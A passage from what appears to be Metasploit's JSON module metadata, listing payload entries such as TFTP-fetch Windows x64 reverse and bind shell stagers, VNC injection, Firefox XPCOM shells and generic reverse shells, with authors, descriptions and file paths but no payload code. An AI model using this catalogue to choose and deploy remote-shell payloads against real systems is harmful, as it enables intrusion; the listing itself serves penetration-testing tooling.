"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/tftp/x64/shell/reverse_tcp_rc4": { - "name": "TFTP Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/shell/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/shell/reverse_tcp_uuid": { - 
"name": "TFTP Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/shell_bind_tcp": { - "name": "TFTP Fetch, Windows x64 Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/windows/tftp/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": 
"cmd/windows/tftp/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/shell_reverse_tcp": { - "name": "TFTP Fetch, Windows x64 Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/windows/tftp/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp": { - "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": 
"Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid": { - "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": 
"windows/x64/vncinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/vncinject/bind_named_pipe": { - "name": "TFTP Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/tftp/x64/vncinject/bind_tcp": { - "name": "TFTP Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": 
"cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/tftp/x64/vncinject/bind_tcp_rc4": { - "name": "TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": 
"windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/vncinject/bind_tcp_uuid": { - "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/vncinject/reverse_http": { - "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - 
"arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/reverse_http", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/tftp/x64/vncinject/reverse_https": { - "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/reverse_https", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": 
"windows/x64/reverse_https" - }, - "payload_cmd/windows/tftp/x64/vncinject/reverse_tcp": { - "name": "TFTP Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4": { - "name": "TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - 
"rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid": { - "name": "TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": 
"windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/vncinject/reverse_winhttp": { - "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/tftp/x64/vncinject/reverse_winhttps": { - "name": "TFTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - 
"platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_firefox/exec": { - "name": "Firefox XPCOM Execute Command", - "fullname": "payload/firefox/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "joev " - ], - "description": "This module runs a shell command on the target OS without touching the disk.\n On Windows, this command will flash the command prompt momentarily.\n This can be avoided by setting WSCRIPT to true, which drops a jscript\n \"launcher\" to disk that hides the prompt.", - "references": [], - "platform": "Firefox", - "arch": "firefox", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/firefox/exec.rb", - "is_install_path": true, - "ref_name": "firefox/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_firefox/shell_bind_tcp": { - "name": "Command Shell, Bind TCP (via Firefox XPCOM script)", - "fullname": "payload/firefox/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "joev " - ], - "description": 
"Creates an interactive shell via Javascript with access to Firefox's XPCOM API", - "references": [], - "platform": "Firefox", - "arch": "firefox", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/firefox/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "firefox/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_firefox/shell_reverse_tcp": { - "name": "Command Shell, Reverse TCP (via Firefox XPCOM script)", - "fullname": "payload/firefox/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "joev " - ], - "description": "Creates an interactive shell via Javascript with access to Firefox's XPCOM API", - "references": [], - "platform": "Firefox", - "arch": "firefox", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/firefox/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "firefox/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_generic/custom": { - "name": "Custom Payload", - "fullname": "payload/generic/custom", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "scriptjunkie " - ], - "description": "Use custom string or file as payload. 
Set either PAYLOADFILE or\n PAYLOADSTR.", - "references": [], - "platform": "All", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/generic/custom.rb", - "is_install_path": true, - "ref_name": "generic/custom", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_generic/debug_trap": { - "name": "Generic x86 Debug Trap", - "fullname": "payload/generic/debug_trap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "robert " - ], - "description": "Generate a debug trap in the target process", - "references": [], - "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/generic/debug_trap.rb", - "is_install_path": true, - "ref_name": "generic/debug_trap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_generic/shell_bind_aws_ssm": { - "name": "Command Shell, Bind SSM (via AWS API)", - "fullname": "payload/generic/shell_bind_aws_ssm", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell using AWS SSM", - "references": [ - 
"URL-https://www.sempervictus.com/single-post/once-upon-a-cloudy-air-i-crossed-a-gap-which-wasn-t-there" - ], - "platform": "All", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/payloads/singles/generic/shell_bind_aws_ssm.rb", - "is_install_path": true, - "ref_name": "generic/shell_bind_aws_ssm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_generic/shell_bind_tcp": { - "name": "Generic Command Shell, Bind TCP Inline", - "fullname": "payload/generic/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "All", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/generic/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "generic/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_generic/shell_reverse_tcp": 
{ - "name": "Generic Command Shell, Reverse TCP Inline", - "fullname": "payload/generic/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "All", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/generic/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "generic/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_generic/ssh/interact": { - "name": "Interact with Established SSH Connection", - "fullname": "payload/generic/ssh/interact", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Interacts with a shell on an established SSH connection", - "references": [], - "platform": "All", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/payloads/singles/generic/ssh/interact.rb", - "is_install_path": true, - "ref_name": "generic/ssh/interact", - "check": 
